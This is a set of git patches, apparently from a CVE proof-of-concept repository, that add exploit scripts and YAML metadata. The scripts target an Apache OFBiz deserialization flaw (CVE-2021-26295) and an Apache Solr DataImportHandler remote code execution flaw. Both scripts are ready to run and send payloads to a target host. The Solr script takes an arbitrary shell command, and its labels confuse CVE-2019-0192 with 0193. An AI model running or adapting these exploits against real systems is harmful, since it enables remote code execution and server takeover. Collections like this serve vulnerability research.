From d5a895b930e928d5805d66a156c0bb57079003ef Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:35:44 +0000 Subject: [PATCH 01/10] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-OFBiz?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-OFBiz/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-OFBiz/.keep diff --git a/cve/apache-OFBiz/.keep b/cve/apache-OFBiz/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From a32743be4603ad04fff5c0a62f49b43137eaa387 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:35:54 +0000 Subject: [PATCH 02/10] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-OFBiz/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-OFBiz/2021/.keep diff --git a/cve/apache-OFBiz/2021/.keep b/cve/apache-OFBiz/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 1e3ea9b05313d1cf02bf6e9ccc9d0130404db020 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:37:16 +0000 Subject: [PATCH 03/10] CVE-2021-26295 Signed-off-by: MaJiahao --- .../2021/CVE-2021-26295/CVE-2021-26295.py | 28 +++++++++++++++++++ .../2021/CVE-2021-26295/README.md | 4 +++ .../2021/yaml/CVE-2021-26295.yaml | 21 ++++++++++++++ 3 files changed, 53 insertions(+) create mode 100644 cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py create mode 100644 cve/apache-OFBiz/2021/CVE-2021-26295/README.md create mode 100644 cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml diff --git a/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py b/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py new file mode 100644 index 00000000..077956e3 --- /dev/null +++ b/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py @@ -0,0 +1,28 @@ +import requests +import sys +import subprocess +import binascii +from urllib3.exceptions import InsecureRequestWarning + +def transfor(content): + return binascii.hexlify(content) +def main(): + res = subprocess.Popen(['java','-jar', 'ysoserial.jar', "URLDNS", dnslog, '>data.ot'], shell=True) + res.wait() + with open('data.ot','rb') as f: + content = f.read() + hex_data = transfor(content) + headers = {'Content-Type': 'text/xml'} + post_data = '''%s''' % hex_data + requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + try: + res = requests.post('%s/webtools/control/SOAPService' % host , data = post_data , headers = headers , verify=False) + if res.status_code == 200 : + print("[+]Done! check your dnslog: " + dnslog) + except: + print("[!]Request error!") + +if __name__ == '__main__': + host = sys.argv[1] + dnslog = sys.argv[2] + main() diff --git a/cve/apache-OFBiz/2021/CVE-2021-26295/README.md b/cve/apache-OFBiz/2021/CVE-2021-26295/README.md new file mode 100644 index 00000000..005b3566 --- /dev/null +++ b/cve/apache-OFBiz/2021/CVE-2021-26295/README.md @@ -0,0 +1,4 @@ +# CVE-2021-26295-Apache-OFBiz +CVE-2021-26295 Apache OFBiz rmi反序列化POC + +需要将ysoserial.jar放置在目录下,且不能使用java的高版本 diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml new file mode 100644 index 00000000..a50c14b5 --- /dev/null +++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml @@ -0,0 +1,21 @@ +id: CVE-2021-26295 +source: https://download.csdn.net/download/weixin_42165508/16093364?utm_medium=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&depth_1-utm_source=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&dest=https%3A%2F%2Fdownload.csdn.net%2Fdownload%2Fweixin_42165508%2F16093364&spm=1003.2020.3001.6616.16 +info: + name: Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。 + severity: critical + description: + CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。 + + scope-of-influence: + Apache OFBiz < upto 17.12.06 + reference: + - https://blog.csdn.net/weixin_39811856/article/details/115238985 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26295 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 9.8 + cve-id: CVE-2021-26295 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: cve2020, Apache, OFBiz -- Gitee From 9ad5ee1b92bf8d38a3c8a69301d15c666ab5c2b0 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:37:22 +0000 Subject: [PATCH 04/10] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-OFBiz/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-OFBiz/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-OFBiz/2021/.keep diff --git a/cve/apache-OFBiz/2021/.keep b/cve/apache-OFBiz/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 68d188df914c428be4f425a9e91c39747bc79148 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:37:30 +0000 Subject: [PATCH 05/10] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-OFBiz/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-OFBiz/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-OFBiz/.keep diff --git a/cve/apache-OFBiz/.keep b/cve/apache-OFBiz/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a5fa1934eacc5effe52b54814ee8342e8a10770c Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:38:37 +0000 Subject: [PATCH 06/10] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-OFBiz/2021/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2021/yaml/CVE-2021-26295.yaml | 21 ------------------- 1 file changed, 21 deletions(-) delete mode 100644 cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml deleted file mode 100644 index a50c14b5..00000000 --- a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2021-26295 -source: https://download.csdn.net/download/weixin_42165508/16093364?utm_medium=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&depth_1-utm_source=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&dest=https%3A%2F%2Fdownload.csdn.net%2Fdownload%2Fweixin_42165508%2F16093364&spm=1003.2020.3001.6616.16 -info: - name: Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。 - severity: critical - description: - CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。 - - scope-of-influence: - Apache OFBiz < upto 17.12.06 - reference: - - https://blog.csdn.net/weixin_39811856/article/details/115238985 - - https://nvd.nist.gov/vuln/detail/CVE-2021-26295 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 9.8 - cve-id: CVE-2021-26295 - cwe-id: CWE-502 - cnvd-id: None - kve-id: None - tags: cve2020, Apache, OFBiz -- Gitee From 04fa1ae309e0eacc4fdb721bf6beef51191274ff Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:38:51 +0000 Subject: [PATCH 07/10] CVE-2021-26295 Signed-off-by: MaJiahao --- .../2021/yaml/CVE-2021-26295.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml new file mode 100644 index 00000000..a3752ef6 --- /dev/null +++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml @@ -0,0 +1,21 @@ +id: CVE-2021-26295 +source: https://download.csdn.net/download/weixin_42165508/16093364?utm_medium=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&depth_1-utm_source=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&dest=https%3A%2F%2Fdownload.csdn.net%2Fdownload%2Fweixin_42165508%2F16093364&spm=1003.2020.3001.6616.16 +info: + name: Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。 + severity: critical + description: + CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。 + + scope-of-influence: + Apache OFBiz < upto 17.12.06 + reference: + - https://blog.csdn.net/weixin_39811856/article/details/115238985 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26295 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-26295 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: cve2020, Apache, OFBiz -- Gitee From d31499427f5488869d62062814167de13b353880 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 13:40:45 +0000 Subject: [PATCH 08/10] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-solr/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-solr/2019/.keep diff --git a/cve/apache-solr/2019/.keep b/cve/apache-solr/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 62fe229da18399d21f287d4ed381a2852545afaa Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 14:00:08 +0000 Subject: [PATCH 09/10] CVE-2019-0192 Signed-off-by: MaJiahao --- .../2019/CVE-2019-0192/CVE-2019-0192.py | 57 +++++++++++++++++++ cve/apache-solr/2019/CVE-2019-0192/README.md | 10 ++++ cve/apache-solr/2019/yaml/CVE-2019-0192.yaml | 19 +++++++ 3 files changed, 86 insertions(+) create mode 100644 cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py create mode 100644 cve/apache-solr/2019/CVE-2019-0192/README.md create mode 100644 cve/apache-solr/2019/yaml/CVE-2019-0192.yaml diff --git a/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py b/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py new file mode 100644 index 00000000..7a8f6cbb --- /dev/null +++ b/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py @@ -0,0 +1,57 @@ +import requests +import json +import sys + + +banner = ''' + ____ _ ____ ____ _____ +/ ___| ___ | |_ __| _ \ / ___| ____| +\___ \ / _ \| | '__| |_) | | | _| + ___) | (_) | | | | _ <| |___| |___ +|____/ \___/|_|_| |_| \_ \____|_____| + +CVE-2019-0193 (Rapid SafeGuard) +''' +print (banner) + +def findcores(url, cmd): + core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' + r = requests.get(url=core_selector_url) + json_strs = json.loads(r.text) + if r.status_code ==200 and "responseHeader" in r.text: + print ("\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))) + for core_selector in json_strs['status']: + coreselector = json_strs['status']['%s'%core_selector]['name'] + print ('\n>>>>The Core Name = %s' % coreselector) + proofofconcept(url,coreselector,cmd) + + else: + print "No core_selector Exit!" + + +def proofofconcept(url,coreselector,cmd): + debug_model_url = url + '/solr/'+ coreselector +'/dataimport?_=1565530241159&indent=on&wt=json' + payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + "Content-type":"application/x-www-form-urlencoded", + "X-Requested-With":"XMLHttpRequest", + "Referer":"http://%s/solr/" % url + + } + r3 = requests.post(url = debug_model_url, data=payload,headers=headers) + print ">>>>> debug_model_url= %s" % debug_model_url + if r3.status_code ==200 and 'Requests' in r3.text: + print ("Exploit Done! Happy Hacking") + else: + print ("No Send Poc Success!") + + + +if __name__ == '__main__': + url = raw_input("Enter IP and Port with http") + cmd = raw_input("Enter command") + findcores(url,cmd) diff --git a/cve/apache-solr/2019/CVE-2019-0192/README.md b/cve/apache-solr/2019/CVE-2019-0192/README.md new file mode 100644 index 00000000..5ccf46b6 --- /dev/null +++ b/cve/apache-solr/2019/CVE-2019-0192/README.md @@ -0,0 +1,10 @@ +# Solr-RCE-CVE-2019-0192 +Apache Solr remote code execution via dataImportHandler + +### Target Solr version: 1.3 – 8.2 +Requirements: DataImportHandler should be enabled, which is not by default. I have tested on version 6.2 + +### python +python solr_RCE.py + + diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml new file mode 100644 index 00000000..067065af --- /dev/null +++ b/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-0192 +source: https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192 +info: + name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 + severity: critical + description: + CVE-2019-0192漏洞本质是ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触发Solr端上的远程代码执行。 + scope-of-influence: + Apache Solr 5.0.0 to 5.5.5, 6.0.0 to 6.6.5 + reference: + - https://github.com/mpgn/CVE-2019-0192 + - https://nvd.nist.gov/vuln/detail/CVE-2019-0192 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0192 + cnvd-id: None + kve-id: None + tags: cve2021,Apache,Solr,RCE -- Gitee From b74ed18d1ae36500a8364dc6bf01e9cb0ed7109f Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Sat, 18 Mar 2023 14:00:14 +0000 Subject: [PATCH 10/10] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-solr/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-solr/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-solr/2019/.keep diff --git a/cve/apache-solr/2019/.keep b/cve/apache-solr/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee